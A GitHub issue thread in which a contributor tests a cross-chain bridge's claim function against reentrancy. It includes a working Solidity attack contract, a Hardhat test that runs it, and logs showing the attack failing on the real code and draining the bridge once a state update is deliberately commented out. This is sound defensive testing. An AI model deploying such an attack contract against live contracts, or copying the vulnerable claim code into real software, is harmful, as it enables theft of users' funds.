### ISSUE TITLE
Test Case ( prevent reentrancy attacks )

### ISSUE THREAD

**Issue by NegruGeorge** [tokamak-network/L2-Assets-Migration#24]
**Reentrancy Protection**
The UpgradeL1Bridge contract has a mechanism to prevent reentrancy attacks in its claim function:

1. Hash Verification: Before allowing a claim, the contract checks if the hash (r) has already been claimed by an address.
2. State Update: The contract sets gb[r] = msg.sender to mark the hash as claimed by the current address.
3. Transfer: If the hash verification passes, the contract proceeds with the fund transfer.

**Key Points**
Reentrancy Attack: An attacker tries to call forceWithdrawClaim recursively.
Protection Mechanism: On subsequent calls, the condition if (v != r || gb[r] != address(0)) prevents the claim by reverting the transaction if gb[r] is not zero.

**Conclusion**
The contract is safe from reentrancy attacks because it updates the state (gb[r] = msg.sender) before transferring funds, ensuring any reentrant call fails the hash verification condition.

**DEMO**

** GenFWStorage CODE:  **

```
/ SPDX-License-Identifier: GPL-3.0 
 pragma solidity >=0.7.0 <0.9.0; 

contract GenFWStorage1 {


	bytes32 constant public _0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807 = 0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807;

	bytes32 constant public _0x954b627a3af77cbde166018a1b3937d5b90e3c00ee2b8957625b45d4ef57b8dc = 0x954b627a3af77cbde166018a1b3937d5b90e3c00ee2b8957625b45d4ef57b8dc;
	bytes32 constant public _0xc01bc2369557a5eaf3a32d34365391f557eedc8fc72d4fdd5b312332f16f5311 = 0xc01bc2369557a5eaf3a32d34365391f557eedc8fc72d4fdd5b312332f16f5311;
	bytes32 constant public _0x00c514433441fe1b3d29f88377870e84b6d3595fcb9c5820e9be8fc9fa191652 = 0x00c514433441fe1b3d29f88377870e84b6d3595fcb9c5820e9be8fc9fa191652;
	bytes32 constant public _0x04c0d35e945aeb33b78b8791d45f7a38142f7107e6c9e54dd2618463c2ca6da7 = 0x04c0d35e945aeb33b78b8791d45f7a38142f7107e6c9e54dd2618463c2ca6da7;
	bytes32 constant public _0xec4a8c41e7718aceeaeb44d7fdf766e0f0f4b1f25b0af5cc890daae348c35b57 = 0xec4a8c41e7718aceeaeb44d7fdf766e0f0f4b1f25b0af5cc890daae348c35b57;
	bytes32 constant public _0xdeeaa8ed92434a45d5db581e1bbc406e6f6409ab2e24e6b5f4869b5f8ba3514c = 0xdeeaa8ed92434a45d5db581e1bbc406e6f6409ab2e24e6b5f4869b5f8ba3514c;
	bytes32 constant public _0x7f6ac061f8f25e1005ffc9a3cc8690553bb810d219bcb948bc1251479cf382f3 = 0x7f6ac061f8f25e1005ffc9a3cc8690553bb810d219bcb948bc1251479cf382f3;
	bytes32 constant public _0x9327e696b8f61cf8678fc36aaefad04cffb7612100ac6742286cc2ab18443674 = 0x9327e696b8f61cf8678fc36aaefad04cffb7612100ac6742286cc2ab18443674;
	bytes32 constant public _0x43124c47776332fb00843f8423c1289fd0c0c85dbe413f3c2d36116c3fea0441 = 0x43124c47776332fb00843f8423c1289fd0c0c85dbe413f3c2d36116c3fea0441;
	bytes32 constant public _0xec18eb6b2a2f6c308907fc2f4ca5a98c3a19eb4dc474a6df485330cc8c575fb2 = 0xec18eb6b2a2f6c308907fc2f4ca5a98c3a19eb4dc474a6df485330cc8c575fb2;
	bytes32 constant public _0x013c5ac1ace00a8519d42be4cf904d8222f271b722454e8ce2a63c295227ea9b = 0x013c5ac1ace00a8519d42be4cf904d8222f271b722454e8ce2a63c295227ea9b;
	bytes32 constant public _0x524be0ce54a5b382b1ab341410e692c6601ab2879f83719631d3913dd79b1041 = 0x524be0ce54a5b382b1ab341410e692c6601ab2879f83719631d3913dd79b1041;
	bytes32 constant public _0x15e482825c5d2c3185d79ec555b97e5265a012944416040c5c9bfd6aac22aff6 = 0x15e482825c5d2c3185d79ec555b97e5265a012944416040c5c9bfd6aac22aff6;
	bytes32 constant public _0xc6a1b2008592816caa71ef1d229c707c9ed8640791a4b60d1a427d8767ae62f6 = 0xc6a1b2008592816caa71ef1d229c707c9ed8640791a4b60d1a427d8767ae62f6;
	bytes32 constant public _0x386290984e21a552644872fb82453e4118d79fccdd12e81970be9028deb4b3fa = 0x386290984e21a552644872fb82453e4118d79fccdd12e81970be9028deb4b3fa;
	bytes32 constant public _0x55b60b9eccfe178321e40a30b64d5d251a144f534868f2b51bfaa34bcf9d7d6a = 0x55b60b9eccfe178321e40a30b64d5d251a144f534868f2b51bfaa34bcf9d7d6a;
	
     .
     .
     .
 }
```

** MaliciousContract CODE: **

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/utils/Address.sol";

interface IUpgradeL1Bridge {
    function forceWithdrawClaim(address _position, string memory _hash, address _token, uint _amount) external;
}

contract MaliciousContract {
    address public upgradeL1BridgeAddress;
    address public tokenAddress;
    uint public amount;
    string public hash;
    address public position;
    bool public attackInProgress = false;
    uint256 stop =0;

    constructor(address _upgradeL1BridgeAddress, address _tokenAddress, address _position, uint _amount, string memory _hash) {
        upgradeL1BridgeAddress = _upgradeL1BridgeAddress;
        tokenAddress = _tokenAddress;
        position = _position;
        amount = _amount;
        hash = _hash;
    }

    // Function to initiate the reentrancy attack
    function startAttack() external {
        attackInProgress = true;
        IUpgradeL1Bridge(upgradeL1BridgeAddress).forceWithdrawClaim(position, hash, tokenAddress, amount);
        attackInProgress = false;
    }

    // Fallback function that will be called during the reentrancy attack
    receive() external payable {
        if(stop <3){
            if (attackInProgress) {
                stop +=1;
                IUpgradeL1Bridge(upgradeL1BridgeAddress).forceWithdrawClaim(position, hash, tokenAddress, amount);
            }
        }

    }

}
```

ATTACK TEST introduced in forcewithdraw2.ts:

```
 it('Reentrancy Attack Test', async () => {
        console.log("inside reentracy")
        await helpers.impersonateAccount(owner);
        await ethers.provider.send('hardhat_impersonateAccount', [owner]);
        await ethers.provider.send('hardhat_setBalance', [owner, '0x152D02C7E14AF6800000']);

        const deployer = await ethers.provider.getSigner(owner);
        const l1Bridge = await ethers.getContractAt("UpgradeL1Bridge", L1BRIDGE);

        // Fund the bridge contract with some ETH
        await deployer.sendTransaction({
            to: l1Bridge.address,
            value: ethers.utils.parseEther("50")
        });
        console.log("L1Bridge address:", l1Bridge.address);
        console.log("Balance of bridge before attack:", (await ethers.provider.getBalance(l1Bridge.address)).toString());

        // Deploy and register storage contract to create a valid position
        const storageContractFactory = await ethers.getContractFactory("GenFWStorage1", deployer as any);
        const storageContract = await storageContractFactory.deploy();
        await storageContract.deployed();

        const closer = await ethers.provider.getSigner(forceOwner);
        await l1Bridge.connect(closer).forceRegistry([storageContract.address]);

        console.log("Registered storage contract at:", storageContract.address);
        console.log("Position validity:", await l1Bridge.position(storageContract.address));

  
        // Deploy MaliciousContract with the registered storage contract
        const maliciousContractFactory = await ethers.getContractFactory(attackABI.abi, attackABI.bytecode, deployer as any);
        const maliciousContract = await maliciousContractFactory.deploy(L1BRIDGE, zeroAddress, storageContract.address, ethers.utils.parseEther("10"), "0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807");
        await maliciousContract.deployed();
        console.log("Malicious contract deployed at:", maliciousContract.address);

       const claimer = await ethers.provider.getSigner("0x4c90e5723fe4de59d0895cafb749fd8756d7ce19")
        console.log(await l1Bridge.positions(0))
        console.log(await l1Bridge.positions(1))
        console.log(await l1Bridge.position(storageContract.address))

        // Fund the malicious contract with some ETH
        await deployer.sendTransaction({
            to: maliciousContract.address,
            value: ethers.utils.parseEther("10")
        });
        console.log("Balance of malicious contract before attack:", (await ethers.provider.getBalance(maliciousContract.address)).toString());

        // Start the attack
        try {
            await maliciousContract.startAttack();
        } catch (error) {
            console.error("Reentrancy attack failed:", error);
        }

        const finalBalance = await ethers.provider.getBalance(maliciousContract.address);
        const bridgeFinalBalance = await ethers.provider.getBalance(l1Bridge.address);
        console.log("Malicious contract final balance:", finalBalance.toString());
        console.log("Balance of bridge after attack:", bridgeFinalBalance.toString());

    });
```

** RUN RESULT **
```
inside reentracy
L1Bridge address: 0x59aa194798Ba87D26Ba6bEF80B85ec465F4bbcfD
Balance of bridge before attack: 56779137425224027881
Registered storage contract at: 0x66424BAbE868b57166aa557F7EE8FD703546e4D0
Position validity: true
Malicious contract deployed at: 0xB477C3aB9F2839361E34359fa55D3560002D347F
0x61B626A562d39439Ab60fCbF19678Dac036D1209
0x58AA941Ba0568DF0886B6eC41233cFe94bF32178
true
Balance of malicious contract before attack: 10000000000000000000
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0x0000000000000000000000000000000000000000
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  56779137425224027881
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0xb477c3ab9f2839361e34359fa55d3560002d347f
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  46779137425224027881
Reentrancy attack failed: Error: VM Exception while processing transaction: reverted with custom error 'FW_FAIl_TRANSFER_ETH()'
    at UpgradeL1Bridge.claim (contracts/UpgradeL1Bridge.sol:175)
    at UpgradeL1Bridge.forceWithdrawClaim (contracts/UpgradeL1Bridge.sol:135)
    at <UnrecognizedContract>.<unknown> (0x59aa194798ba87d26ba6bef80b85ec465f4bbcfd)
    at MaliciousContract.startAttack (contracts/MaliciousContrat.sol:31)
    at MaliciousContract.startAttack (contracts/MaliciousContrat.sol:31)
    at EdrProviderWrapper.request (/home/negru/negru_george/tokamak/L2-Assets-Migration/titanLagacy/node_modules/hardhat/src/internal/hardhat-network/provider/provider.ts:430:41)
    at async EthersProviderWrapper.send (/home/negru/negru_george/tokamak/L2-Assets-Migration/titanLagacy/node_modules/@nomiclabs/hardhat-ethers/src/internal/ethers-provider-wrapper.ts:13:20)
Malicious contract final balance: 10000000000000000000
Balance of bridge after attack: 56779137425224027881
```

### ALTERNATIVE CASE, WORST CASE. IF gb[r] = msg.sender would have been skipped

ATTACK if  gb[r] = msg.sender   is commented. **NOT THE CASE IN OUR CODE** 

WRONG CODE ( gb[r] = msg.sender is commented ): 
```
    function claim(address _position, string memory _hash, address _token, uint _amount) internal {
        if(!position[_position]) revert FW_NOT_AVAILABLE_POSITION();
        
        string memory f = string(abi.encodePacked("_",_hash,"()")); 
        console.logString(f);
        (bool s, bytes memory d) = _position.staticcall(abi.encodeWithSignature(f));
        
        if (!s || d.length == 0) {
            revert FW_NOT_SEARCH_POSITION();
        }

        bytes32 v = keccak256(abi.encodePacked(_token, msg.sender, _amount));
        bytes32 r = abi.decode(d, (bytes32));

        console.log("in claim");
        console.logAddress(gb[r]);
        console.logBytes32(v);
        console.logBytes32(r);
        console.log("balance Bridge: ", address(this).balance);

        if (v != r || gb[r] != address(0)) {
            revert FW_INVALID_HASH();
        }

        // gb[r] = msg.sender;   !!!!!!!!!!!!!!!!!!!!!!!!

        if (_token == address(0)) {
            (s, ) = msg.sender.call{ value: _amount }(new bytes(0));
            if(!s) revert FW_FAIl_TRANSFER_ETH();
        } else IERC20(_token).safeTransfer(msg.sender, _amount);

        emit ForceWithdraw(r, _token, _amount, msg.sender);
    }
 
```

** ATTACK WORKED: ** 

```
inside reentracy
L1Bridge address: 0x59aa194798Ba87D26Ba6bEF80B85ec465F4bbcfD
Balance of bridge before attack: 56779137425224027881
Registered storage contract at: 0x66424BAbE868b57166aa557F7EE8FD703546e4D0
Position validity: true
Malicious contract deployed at: 0xB477C3aB9F2839361E34359fa55D3560002D347F
0x61B626A562d39439Ab60fCbF19678Dac036D1209
0x58AA941Ba0568DF0886B6eC41233cFe94bF32178
true
Balance of malicious contract before attack: 10000000000000000000
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0x0000000000000000000000000000000000000000
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  56779137425224027881
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0x0000000000000000000000000000000000000000
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  46779137425224027881
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0x0000000000000000000000000000000000000000
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  36779137425224027881
_0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807()
in claim
0x0000000000000000000000000000000000000000
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
0x9d9addeed85cdb63cd3393bb72489755768ff771ba5b0e6446921a824afb3807
balance Bridge:  26779137425224027881
Malicious contract final balance: 50000000000000000000
Balance of bridge after attack: 16779137425224027881

```

**Comment by DevUreak** [comment]
Thanks for checking out!

**Comment by NegruGeorge** [comment]
A ReentrancyGuard might be usefull. Not necesarry but is considered best Practice. https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/ReentrancyGuard.sol

**Comment by DevUreak** [comment]
Thanks for sharing. This logic increases gas costs, so it needs to be taken into consideration. Claim() has simple logic. I don’t think there will be any problems if we review it in detail.

**Comment by DevUreak** [comment]
I will not add ReentrancyGuard, I think it is right to reduce gas costs to users as much as possible, and the logic is not complicated so other risks can be sufficiently considered. @NegruGeorge 
If there are no additional comments on this, I will close the issue thanks!

**Comment by DevUreak** [comment]
There are no issues with re-entry, so i will close it.
